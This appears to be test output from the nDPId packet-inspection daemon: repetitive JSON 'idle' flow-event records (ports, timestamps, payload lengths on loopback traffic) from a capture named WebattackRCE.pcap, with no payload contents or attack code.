+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276711,"flow_last_seen":1576420276711,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276713,"flow_last_seen":1576420276713,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7560000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7560000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 